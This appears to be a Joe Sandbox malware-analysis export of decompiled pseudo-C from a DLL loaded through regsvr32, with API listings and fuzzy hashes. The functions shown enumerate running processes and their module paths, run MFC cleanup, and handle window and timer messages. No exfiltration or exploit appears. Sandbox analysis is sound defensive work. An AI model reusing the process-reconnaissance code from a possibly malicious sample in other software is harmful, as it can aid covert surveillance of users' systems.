                                                                                                                				 *((intOrPtr*)(_t116 + 0x14)) = _t50;
                                                                                                                				_t113 = 0;
                                                                                                                				 *((intOrPtr*)(_t116 + 0x1234)) = 0;
                                                                                                                				if(_t50 == 0) {
                                                                                                                					_t106 = 0;
                                                                                                                					__eflags = 0;
                                                                                                                				} else {
                                                                                                                					_t106 = E10029DAB(_t50);
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t116 + 0x1240)) = 0xffffffff;
                                                                                                                				 *((char*)(_t116 + 0x1030)) = 0;
                                                                                                                				E1003BB70(_t106, _t116 + 0x1029, _t113, 0x103);
                                                                                                                				_t117 = _t116 + 0xc;
                                                                                                                				_push(_t117 + 0x1c);
                                                                                                                				_push(0x1000);
                                                                                                                				_t100 = _t117 + 0x2c;
                                                                                                                				_push(_t117 + 0x2c);
                                                                                                                				L100504DC();
                                                                                                                				_t54 =  *(_t117 + 0x1c) >> 2;
                                                                                                                				 *(_t117 + 0x14) = _t54;
                                                                                                                				if(_t54 == 0) {
                                                                                                                					L12:
                                                                                                                					_t109 =  *(_t117 + 0x14);
                                                                                                                					goto L13;
                                                                                                                				} else {
                                                                                                                					_t80 = GetShortPathNameA;
                                                                                                                					do {
                                                                                                                						_t109 = OpenProcess(0x410, 0,  *(_t117 + 0x24 + _t113 * 4));
                                                                                                                						if(_t109 == 0) {
                                                                                                                							goto L9;
                                                                                                                						}
                                                                                                                						_push(_t117 + 0x1c);
                                                                                                                						_push(4);
                                                                                                                						_push(_t117 + 0x28);
                                                                                                                						_push(_t109);
                                                                                                                						L100504D6();
                                                                                                                						_push(0x104);
                                                                                                                						_push(_t117 + 0x1028);
                                                                                                                						_push( *(_t117 + 0x20));
                                                                                                                						_push(_t109);
                                                                                                                						L100504D0();
                                                                                                                						GetShortPathNameA(_t117 + 0x1028, _t117 + 0x1028, 0x100);
                                                                                                                						_t100 =  *(_t117 + 0x24 + _t113 * 4);
                                                                                                                						E10050AB8( *(_t117 + 0x24 + _t113 * 4), _t117 + 0x112c, 0xa);
                                                                                                                						_t117 = _t117 + 0xc;
                                                                                                                						_t65 = E100173A6();
                                                                                                                						_t123 = _t65;
                                                                                                                						_t91 = 0 | _t123 != 0x00000000;
                                                                                                                						if(_t123 != 0) {
                                                                                                                							E10001000(_t91, _t100, 0x80004005);
                                                                                                                							goto L12;
                                                                                                                						}
                                                                                                                						 *((intOrPtr*)(_t117 + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)( *_t65 + 0xc))))() + 0x10;
                                                                                                                						_t104 = _t117 + 0x1c;
                                                                                                                						 *((intOrPtr*)(_t117 + 0x1240)) = 1;
                                                                                                                						E10003500(_t117 + 0x1c, 0x100585c0, _t117 + 0x1024);
                                                                                                                						_t117 = _t117 + 0xc;
                                                                                                                						_t95 = _t106;
                                                                                                                						E10029F99(_t80, _t95, _t104, _t113,  *((intOrPtr*)(_t106 + 8)), _t117 + 0x18);
                                                                                                                						_t74 =  *((intOrPtr*)(_t117 + 0x18)) + 0xfffffff0;
                                                                                                                						 *((intOrPtr*)(_t117 + 0x1234)) = 0xffffffff;
                                                                                                                						_t100 =  &(_t74[3]);
                                                                                                                						asm("lock xadd [edx], ecx");
                                                                                                                						if((_t95 | 0xffffffff) - 1 <= 0) {
                                                                                                                							_t100 =  *( *_t74);
                                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *( *_t74) + 4))))(_t74);
                                                                                                                						}
                                                                                                                						L9:
                                                                                                                						_t113 = _t113 + 1;
                                                                                                                					} while (_t113 <  *(_t117 + 0x14));
                                                                                                                					L13:
                                                                                                                					CloseHandle(_t109);
                                                                                                                					CloseHandle( *(_t117 + 0x20));
                                                                                                                					 *[fs:0x0] =  *((intOrPtr*)(_t117 + 0x122c));
                                                                                                                					_pop(_t107);
                                                                                                                					_pop(_t111);
                                                                                                                					_pop(_t79);
                                                                                                                					return E1003B437(_t106, _t79,  *(_t117 + 0x1214) ^ _t117, _t100, _t107, _t111);
                                                                                                                				}
                                                                                                                			}

























                                                                                                                0x1000cf13
                                                                                                                0x1000cf16
                                                                                                                0x1000cf21
                                                                                                                0x1000cf27
                                                                                                                0x1000cf2e
                                                                                                                0x1000cf32
                                                                                                                0x1000cf38
                                                                                                                0x1000cf38
                                                                                                                0x1000cf3a
                                                                                                                0x1000cf3a
                                                                                                                0x1000cf3d
                                                                                                                0x1000cf57
                                                                                                                0x1000cf5e
                                                                                                                0x1000cf65
                                                                                                                0x1000cf70
                                                                                                                0x1000cf78
                                                                                                                0x1000cf79
                                                                                                                0x1000cf7b
                                                                                                                0x1000cf90
                                                                                                                0x1000cf90

                                                                                                                APIs
                                                                                                                  • Part of subcall function 100160BC: _malloc.LIBCMT ref: 100160D6
                                                                                                                • _memset.LIBCMT ref: 1000CE18
                                                                                                                • EnumProcesses.PSAPI(?,00001000,?,?,00000000,00000103), ref: 1000CE2F
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,00001000,?,?,00000000,00000103), ref: 1000CE57
                                                                                                                • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 1000CE74
                                                                                                                • GetModuleFileNameExA.PSAPI(00000000,?,?,00000104,00000000,?,00000004,?), ref: 1000CE8C
                                                                                                                • GetShortPathNameA.KERNEL32 ref: 1000CEA1
                                                                                                                • __itoa.LIBCMT ref: 1000CEB2
                                                                                                                • CloseHandle.KERNEL32(?), ref: 1000CF5E
                                                                                                                • CloseHandle.KERNEL32(?), ref: 1000CF65
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseEnumHandleNameProcess$FileModuleModulesOpenPathProcessesShort__itoa_malloc_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3268912965-0
                                                                                                                • Opcode ID: 00df60eecbbb03283746c588b31f46c72852db74f528f4c16e1111c64864dce6
                                                                                                                • Instruction ID: 395214f1ab154b6152452bfbc70029a431b58c0cf8f3c574ba6b343257910b72
                                                                                                                • Opcode Fuzzy Hash: 00df60eecbbb03283746c588b31f46c72852db74f528f4c16e1111c64864dce6
                                                                                                                • Instruction Fuzzy Hash: 0A518275604745AFE324DB68DC41EEBB3E9EF88350F004A2DF699C7290DB74E9448B92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E1000A910(void* __ebx, signed int __edx, void* __edi, void* __ebp, void* __eflags) {
                                                                                                                				char _v4;
                                                                                                                				char _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				void* __ecx;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t72;
                                                                                                                				signed int** _t83;
                                                                                                                				intOrPtr* _t89;
                                                                                                                				void* _t90;
                                                                                                                				void* _t106;
                                                                                                                				void* _t108;
                                                                                                                				intOrPtr _t113;
                                                                                                                				signed int _t152;
                                                                                                                				intOrPtr _t158;
                                                                                                                				void* _t160;
                                                                                                                				signed int _t161;
                                                                                                                				void* _t163;
                                                                                                                
                                                                                                                				_t163 = __eflags;
                                                                                                                				_t160 = __ebp;
                                                                                                                				_t156 = __edi;
                                                                                                                				_t112 = __ebx;
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(E1005171C);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_push(_t113);
                                                                                                                				_t72 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_push(_t72 ^ _t161);
                                                                                                                				 *[fs:0x0] =  &_v12;
                                                                                                                				_t158 = _t113;
                                                                                                                				_v16 = _t158;
                                                                                                                				_v4 = 0x1e;
                                                                                                                				E1000A7A0();
                                                                                                                				_v4 = 0x1d;
                                                                                                                				E10020C98(_t158 + 0x13ac, __edi, _t158, _t163);
                                                                                                                				_v4 = 0x1c;
                                                                                                                				E100032E0(__edx, _t163);
                                                                                                                				_v4 = 0x1b;
                                                                                                                				E10020C98(_t158 + 0x1258, __edi, _t158, _t163);
                                                                                                                				_v4 = 0x1a;
                                                                                                                				E1000A860(__edx, _t163);
                                                                                                                				_v4 = 0x19;
                                                                                                                				E10020C98(_t158 + 0x10f4, __edi, _t158, _t163);
                                                                                                                				_v4 = 0x18;
                                                                                                                				E10026B7A(__ebx, _t158 + 0x1030, _t156, _t158, _t163);
                                                                                                                				_t83 =  *((intOrPtr*)(_t158 + 0x102c)) - 0x10;
                                                                                                                				_v4 = 0x17;
                                                                                                                				asm("lock xadd [ecx], edx");
                                                                                                                				_t152 = (__edx | 0xffffffff) - 1;
                                                                                                                				_t164 = _t152;
                                                                                                                				if(_t152 <= 0) {
                                                                                                                					_t152 =  *( *_t83);
                                                                                                                					 *((intOrPtr*)( *((intOrPtr*)(_t152 + 4))))(_t83);
                                                                                                                				}
                                                                                                                				_v4 = 0x16;
                                                                                                                				E1001F6F7(_t158 + 0x1018);
                                                                                                                				_v4 = 0x15;
                                                                                                                				E10020C98(_t158 + 0xfa4, _t156, _t158, _t164);
                                                                                                                				_v4 = 0x14;
                                                                                                                				E1000A6F0(_t152);
                                                                                                                				_v4 = 0x13;
                                                                                                                				E1000A670();
                                                                                                                				_t89 =  *((intOrPtr*)(_t158 + 0x94c)) - 0x10;
                                                                                                                				_v4 = 0x12;
                                                                                                                				asm("lock xadd [ecx], edx");
                                                                                                                				_t165 = (_t152 | 0xffffffff) - 1;
                                                                                                                				if((_t152 | 0xffffffff) - 1 <= 0) {
                                                                                                                					_t89 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t89)) + 4))))(_t89);
                                                                                                                				}
                                                                                                                				_v4 = 0x11;
                                                                                                                				_t90 = E10026994(_t89, _t112, _t158 + 0x7e0);
                                                                                                                				_v4 = 0x10;
                                                                                                                				E10026994(_t90, _t112, _t158 + 0x7d4);
                                                                                                                				_v4 = 0xf;
                                                                                                                				E10004BE0(_t160);
                                                                                                                				_v4 = 0xe;
                                                                                                                				E1001A3E3(_t112, _t158 + 0x670, _t156, _t158, _t165);
                                                                                                                				_v4 = 0xd;
                                                                                                                				E100115D0(_t112, _t158 + 0x5a4, _t156, _t158);
                                                                                                                				_v4 = 0xc;
                                                                                                                				E100263C8(_t158 + 0x550, _t156, _t158, _t165);
                                                                                                                				_v4 = 0xb;
                                                                                                                				E10021A4D(_t158 + 0x4fc, _t156, _t158, _t165);
                                                                                                                				_v4 = 0xa;
                                                                                                                				E10021AC4(_t158 + 0x4a8, _t156, _t158, _t165);
                                                                                                                				_v4 = 9;
                                                                                                                				E10021AF5(_t158 + 0x454, _t156, _t158, _t165);
                                                                                                                				_v4 = 8;
                                                                                                                				E10021AC4(_t158 + 0x400, _t156, _t158, _t165);
                                                                                                                				_v4 = 7;
                                                                                                                				E10021AC4(_t158 + 0x3ac, _t156, _t158, _t165);
                                                                                                                				_v4 = 6;
                                                                                                                				E1002634B(_t158 + 0x358, _t156, _t158, _t165);
                                                                                                                				_v4 = 5;
                                                                                                                				E10021AF5(_t158 + 0x304, _t156, _t158, _t165);
                                                                                                                				_v4 = 4;
                                                                                                                				E1002634B(_t158 + 0x2b0, _t156, _t158, _t165);
                                                                                                                				_v4 = 3;
                                                                                                                				E1001614A(_t158 + 0x2a8);
                                                                                                                				_v4 = 2;
                                                                                                                				E1001614A(_t158 + 0x2a0);
                                                                                                                				_v4 = 1;
                                                                                                                				_t106 = E1001614A(_t158 + 0x298);
                                                                                                                				_v4 = 0;
                                                                                                                				E10026994(_t106, _t112, _t158 + 0x27c);
                                                                                                                				_v4 = 0xffffffff;
                                                                                                                				_t108 = E10020C98(_t158, _t156, _t158, _t165);
                                                                                                                				 *[fs:0x0] = _v12;
                                                                                                                				return _t108;
                                                                                                                			}




















                                                                                                                0x1000aaef
                                                                                                                0x1000aaf4
                                                                                                                0x1000aaff
                                                                                                                0x1000ab04
                                                                                                                0x1000ab0f
                                                                                                                0x1000ab14
                                                                                                                0x1000ab1f
                                                                                                                0x1000ab24
                                                                                                                0x1000ab2f
                                                                                                                0x1000ab34
                                                                                                                0x1000ab3f
                                                                                                                0x1000ab44
                                                                                                                0x1000ab4f
                                                                                                                0x1000ab54
                                                                                                                0x1000ab5b
                                                                                                                0x1000ab63
                                                                                                                0x1000ab6c
                                                                                                                0x1000ab78

                                                                                                                APIs
                                                                                                                  • Part of subcall function 1000A7A0: ~_Task_impl.LIBCPMT ref: 1000A7D6
                                                                                                                  • Part of subcall function 1000A7A0: ~_Task_impl.LIBCPMT ref: 1000A7E6
                                                                                                                  • Part of subcall function 1000A7A0: ~_Task_impl.LIBCPMT ref: 1000A7F6
                                                                                                                  • Part of subcall function 1000A7A0: ~_Task_impl.LIBCPMT ref: 1000A803
                                                                                                                  • Part of subcall function 10020C98: __EH_prolog3.LIBCMT ref: 10020C9F
                                                                                                                  • Part of subcall function 100032E0: ~_Task_impl.LIBCPMT ref: 10003313
                                                                                                                  • Part of subcall function 1000A860: ~_Task_impl.LIBCPMT ref: 1000A896
                                                                                                                  • Part of subcall function 10026B7A: __EH_prolog3.LIBCMT ref: 10026B81
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1000AA94
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1000AAA4
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1000AAB4
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1000AAC4
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1000AAD4
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1000AAE4
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1000AAF4
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1000AB04
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1000AB14
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Task_impl$H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 1204490572-0
                                                                                                                • Opcode ID: a7f2ffbca92d85504c22c72b6cf8b1f9b84439077505d18c78f9fe4a6d226f32
                                                                                                                • Instruction ID: ab9487c9aa4a9673fd20d92da6fdb9043eabc56a34cc037b5be037682f10b7c2
                                                                                                                • Opcode Fuzzy Hash: a7f2ffbca92d85504c22c72b6cf8b1f9b84439077505d18c78f9fe4a6d226f32
                                                                                                                • Instruction Fuzzy Hash: 76611B38009B818EE315CB78D5557DABBD0EFAA714F84494CE4EA13282DB74B64DC6B3
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 98%
                                                                                                                			E10035F21(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				struct tagPOINT _v20;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				short _t42;
                                                                                                                				signed int _t49;
                                                                                                                				struct HWND__* _t60;
                                                                                                                				intOrPtr _t63;
                                                                                                                				intOrPtr* _t64;
                                                                                                                				intOrPtr _t66;
                                                                                                                				void* _t68;
                                                                                                                				void* _t72;
                                                                                                                				intOrPtr* _t75;
                                                                                                                				intOrPtr _t83;
                                                                                                                				void* _t84;
                                                                                                                				intOrPtr _t85;
                                                                                                                				struct HWND__* _t87;
                                                                                                                				intOrPtr _t88;
                                                                                                                				intOrPtr* _t89;
                                                                                                                				void* _t90;
                                                                                                                
                                                                                                                				_t76 = __ecx;
                                                                                                                				_t89 = __ecx;
                                                                                                                				_t42 = GetKeyState(1);
                                                                                                                				_t91 = _t42;
                                                                                                                				if(_t42 < 0) {
                                                                                                                					return _t42;
                                                                                                                				}
                                                                                                                				_t85 = E100231BA(_t72, _t76, _t84, _t89, _t91);
                                                                                                                				_v12 = _t85;
                                                                                                                				GetCursorPos( &_v20);
                                                                                                                				ScreenToClient( *(_t89 + 0x20),  &_v20);
                                                                                                                				_t49 =  *((intOrPtr*)( *_t89 + 0x6c))(_v20.x, _v20.y, 0, _t84, _t72);
                                                                                                                				_v8 = _t49;
                                                                                                                				if(_t49 < 0) {
                                                                                                                					_t16 = _t85 + 0x4c;
                                                                                                                					 *_t16 =  *(_t85 + 0x4c) | 0xffffffff;
                                                                                                                					__eflags =  *_t16;
                                                                                                                					L18:
                                                                                                                					if(_v8 < 0) {
                                                                                                                						L27:
                                                                                                                						if( *(_v12 + 0x4c) == 0xffffffff) {
                                                                                                                							KillTimer( *(_t89 + 0x20), 0xe001);
                                                                                                                						}
                                                                                                                						 *((intOrPtr*)( *_t89 + 0x164))(0xffffffff);
                                                                                                                						L30:
                                                                                                                						_t53 = 0xe000;
                                                                                                                						if(_a4 == 0xe000) {
                                                                                                                							_t53 = KillTimer( *(_t89 + 0x20), 0xe000);
                                                                                                                							if(_v8 >= 0) {
                                                                                                                								_t53 =  *((intOrPtr*)( *_t89 + 0x164))(_v8);
                                                                                                                							}
                                                                                                                						}
                                                                                                                						return _t53;
                                                                                                                					}
                                                                                                                					ClientToScreen( *(_t89 + 0x20),  &_v20);
                                                                                                                					_push(_v20.y);
                                                                                                                					_t87 = WindowFromPoint(_v20);
                                                                                                                					if(_t87 == 0) {
                                                                                                                						L25:
                                                                                                                						_t59 = _v12;
                                                                                                                						_v8 = _v8 | 0xffffffff;
                                                                                                                						 *(_t59 + 0x4c) =  *(_v12 + 0x4c) | 0xffffffff;
                                                                                                                						L26:
                                                                                                                						if(_v8 >= 0) {
                                                                                                                							goto L30;
                                                                                                                						}
                                                                                                                						goto L27;
                                                                                                                					}
                                                                                                                					_t60 =  *(_t89 + 0x20);
                                                                                                                					if(_t87 == _t60 || IsChild(_t60, _t87) != 0) {
                                                                                                                						goto L26;
                                                                                                                					} else {
                                                                                                                						_t63 =  *((intOrPtr*)(_v12 + 0x3c));
                                                                                                                						if(_t63 != 0) {
                                                                                                                							_t63 =  *((intOrPtr*)(_t63 + 0x20));
                                                                                                                						}
                                                                                                                						if(_t63 == _t87) {
                                                                                                                							goto L26;
                                                                                                                						} else {
                                                                                                                							goto L25;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t64 = E1001B075(_t72, _t89, _t85);
                                                                                                                				_t81 = _t89;
                                                                                                                				_t75 = _t64;
                                                                                                                				if(E1001BFD0(_t75, _t89, _t85) == 0) {
                                                                                                                					L6:
                                                                                                                					_v8 = _v8 | 0xffffffff;
                                                                                                                					goto L7;
                                                                                                                				} else {
                                                                                                                					_t94 = _t75;
                                                                                                                					if(_t75 == 0) {
                                                                                                                						E1001729E(_t75, _t81, _t85, _t89, _t94);
                                                                                                                					}
                                                                                                                					_t81 = _t75;
                                                                                                                					if(E1001D37F(_t75) != 0) {
                                                                                                                						L7:
                                                                                                                						_t66 =  *((intOrPtr*)(_t85 + 0x3c));
                                                                                                                						if(_t66 != 0) {
                                                                                                                							_t88 =  *((intOrPtr*)(_t66 + 0x20));
                                                                                                                						} else {
                                                                                                                							_t88 = 0;
                                                                                                                						}
                                                                                                                						_t68 = E10019C16(_t75, _t81, _t90, GetCapture());
                                                                                                                						if(_t68 != _t89) {
                                                                                                                							if(_t68 != 0) {
                                                                                                                								_t83 =  *((intOrPtr*)(_t68 + 0x20));
                                                                                                                							} else {
                                                                                                                								_t83 = 0;
                                                                                                                							}
                                                                                                                							if(_t83 != _t88 && E1001B075(_t75, _t68, _t88) == _t75) {
                                                                                                                								_v8 = _v8 | 0xffffffff;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						goto L18;
                                                                                                                					}
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                			}


























                                                                                                                0x1003602a
                                                                                                                0x1003602f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003602f
                                                                                                                0x10036012
                                                                                                                0x10035f76
                                                                                                                0x10035f7b
                                                                                                                0x10035f7d
                                                                                                                0x10035f86
                                                                                                                0x10035f9c
                                                                                                                0x10035f9c
                                                                                                                0x00000000
                                                                                                                0x10035f88
                                                                                                                0x10035f88
                                                                                                                0x10035f8a
                                                                                                                0x10035f8c
                                                                                                                0x10035f8c
                                                                                                                0x10035f91
                                                                                                                0x10035f9a
                                                                                                                0x10035fa0
                                                                                                                0x10035fa0
                                                                                                                0x10035fa5
                                                                                                                0x10035fab
                                                                                                                0x10035fa7
                                                                                                                0x10035fa7
                                                                                                                0x10035fa7
                                                                                                                0x10035fb5
                                                                                                                0x10035fbc
                                                                                                                0x10035fc0
                                                                                                                0x10035fc6
                                                                                                                0x10035fc2
                                                                                                                0x10035fc2
                                                                                                                0x10035fc2
                                                                                                                0x10035fcb
                                                                                                                0x10035fd8
                                                                                                                0x10035fd8
                                                                                                                0x10035fcb
                                                                                                                0x00000000
                                                                                                                0x10035fbc
                                                                                                                0x00000000
                                                                                                                0x10035f9a

                                                                                                                APIs
                                                                                                                • GetKeyState.USER32(00000001), ref: 10035F2C
                                                                                                                • GetCursorPos.USER32(?), ref: 10035F4B
                                                                                                                • ScreenToClient.USER32(?,?), ref: 10035F58
                                                                                                                • GetCapture.USER32 ref: 10035FAE
                                                                                                                  • Part of subcall function 1001729E: __CxxThrowException@8.LIBCMT ref: 100172B2
                                                                                                                  • Part of subcall function 1001729E: __EH_prolog3.LIBCMT ref: 100172BF
                                                                                                                • ClientToScreen.USER32(?,?), ref: 10035FF5
                                                                                                                • WindowFromPoint.USER32 ref: 10036001
                                                                                                                • IsChild.USER32(?,00000000), ref: 10036016
                                                                                                                • KillTimer.USER32 ref: 10036053
                                                                                                                • KillTimer.USER32 ref: 1003606F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientKillScreenTimer$CaptureChildCursorException@8FromH_prolog3PointStateThrowWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3327746620-0
                                                                                                                • Opcode ID: 9a79a584eef3040230d5039f7eb7f788dd608f73662f2d0181e765333235b229
                                                                                                                • Instruction ID: 540b38134c8046dac9f729ea4deea094e81d082f0627462e531a61011f967001
                                                                                                                • Opcode Fuzzy Hash: 9a79a584eef3040230d5039f7eb7f788dd608f73662f2d0181e765333235b229
                                                                                                                • Instruction Fuzzy Hash: DA419031600615EFDB22DB64CD49A5E7BB5FF48362F214668E561DB2F1EB32DD418B00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E100282D4(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				int _t50;
                                                                                                                				void* _t54;
                                                                                                                				unsigned int _t60;
                                                                                                                				unsigned int _t64;
                                                                                                                				unsigned int _t66;
                                                                                                                				unsigned int _t69;
                                                                                                                				signed int _t79;
                                                                                                                				intOrPtr _t81;
                                                                                                                				void* _t82;
                                                                                                                				void* _t83;
                                                                                                                
                                                                                                                				_t83 = __eflags;
                                                                                                                				_t77 = __ecx;
                                                                                                                				_push(0x3c);
                                                                                                                				E1003D219(E10053C55, __ebx, __edi, __esi);
                                                                                                                				_t79 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t82 - 0x20)) = __ecx;
                                                                                                                				_t81 = E100231BA(__ebx, __ecx, __ecx, __esi, _t83);
                                                                                                                				 *((intOrPtr*)(_t82 - 0x24)) = _t81;
                                                                                                                				 *((intOrPtr*)(_t82 - 0x18)) = 1;
                                                                                                                				 *((intOrPtr*)(__ecx + 0xc)) = _t82 - 0x18;
                                                                                                                				 *(_t82 - 0x1c) = E10023206();
                                                                                                                				_t50 = SetTimer( *(_t81 + 0x2c), 1,  *(__ecx + 8), 0);
                                                                                                                				 *(_t82 - 0x28) = _t50;
                                                                                                                				if(_t50 == 0) {
                                                                                                                					E10023F14(_t77);
                                                                                                                				}
                                                                                                                				 *(_t82 - 0x14) = 1;
                                                                                                                				while( *((intOrPtr*)(_t82 - 0x18)) != 0) {
                                                                                                                					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
                                                                                                                					if(PeekMessageA(_t82 - 0x48,  *(_t81 + 0x2c), 0x373, 0x374, 1) == 0) {
                                                                                                                						_t60 = PeekMessageA(_t82 - 0x48,  *(_t81 + 0x2c), 0x113, 0x113, 1);
                                                                                                                						__eflags = _t60;
                                                                                                                						if(_t60 != 0) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						__eflags =  *(_t82 - 0x14) - _t60;
                                                                                                                						if( *(_t82 - 0x14) == _t60) {
                                                                                                                							L24:
                                                                                                                							WaitMessage();
                                                                                                                							 *(_t82 - 0x14) = 1;
                                                                                                                							L25:
                                                                                                                							 *(_t82 - 4) =  *(_t82 - 4) | 0xffffffff;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						L20:
                                                                                                                						_t64 = PeekMessageA(_t82 - 0x48, 0, 0, 0, 0);
                                                                                                                						__eflags = _t64;
                                                                                                                						if(_t64 == 0) {
                                                                                                                							goto L24;
                                                                                                                						}
                                                                                                                						_t77 = _t79;
                                                                                                                						_t66 =  *((intOrPtr*)( *_t79 + 0x40))();
                                                                                                                						__eflags = _t66;
                                                                                                                						if(_t66 == 0) {
                                                                                                                							 *(_t82 - 0x14) =  *(_t82 - 0x14) & 0x00000000;
                                                                                                                						} else {
                                                                                                                							_t77 =  *(_t82 - 0x1c);
                                                                                                                							 *((intOrPtr*)( *( *(_t82 - 0x1c)) + 0x60))(0xffffffff);
                                                                                                                						}
                                                                                                                						goto L25;
                                                                                                                					}
                                                                                                                					if( *((intOrPtr*)(_t82 - 0x44)) != 0x373) {
                                                                                                                						_t69 =  *(_t82 - 0x3c);
                                                                                                                						L14:
                                                                                                                						__eflags =  *(_t82 - 0x40);
                                                                                                                						if( *(_t82 - 0x40) != 0) {
                                                                                                                							L16:
                                                                                                                							E100282A2(1, _t77, _t79, _t82,  *((intOrPtr*)(_t82 - 0x44)),  *(_t82 - 0x40), _t69);
                                                                                                                							L17:
                                                                                                                							 *(_t82 - 0x14) = 1;
                                                                                                                							goto L20;
                                                                                                                						}
                                                                                                                						__eflags = _t69;
                                                                                                                						if(_t69 == 0) {
                                                                                                                							goto L17;
                                                                                                                						}
                                                                                                                						goto L16;
                                                                                                                					}
                                                                                                                					_t69 =  *(_t82 - 0x3c);
                                                                                                                					if( *(_t82 - 0x40) !=  *((intOrPtr*)(_t79 + 4))) {
                                                                                                                						goto L14;
                                                                                                                					}
                                                                                                                					if(_t69 == 0x20) {
                                                                                                                						break;
                                                                                                                					}
                                                                                                                					_t77 = _t69 & 0x0000ffff;
                                                                                                                					if((_t69 & 0x0000ffff) !=  *((intOrPtr*)(_t82 + 8))) {
                                                                                                                						goto L14;
                                                                                                                					}
                                                                                                                					if( *((intOrPtr*)(_t82 + 8)) == 0x10) {
                                                                                                                						 *(_t79 + 0x10) = _t69 >> 0x10;
                                                                                                                					}
                                                                                                                					break;
                                                                                                                				}
                                                                                                                				KillTimer( *(_t81 + 0x2c),  *(_t82 - 0x28));
                                                                                                                				if( *((intOrPtr*)(_t82 - 0x18)) != 0) {
                                                                                                                					 *((intOrPtr*)(_t79 + 0xc)) = 0;
                                                                                                                					PostMessageA( *(_t81 + 0x2c), 0x373, 0, 0);
                                                                                                                					_t54 = 1;
                                                                                                                				} else {
                                                                                                                					__imp__#112(0x2714);
                                                                                                                					_t54 = 0;
                                                                                                                				}
                                                                                                                				return E1003D2BE(_t54);
                                                                                                                			}













                                                                                                                0x100283a1
                                                                                                                0x100283a1
                                                                                                                0x100283a5
                                                                                                                0x100283ab
                                                                                                                0x100283b2
                                                                                                                0x100283b7
                                                                                                                0x100283b7
                                                                                                                0x00000000
                                                                                                                0x100283b7
                                                                                                                0x100283a7
                                                                                                                0x100283a9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x100283a9
                                                                                                                0x10028356
                                                                                                                0x10028359
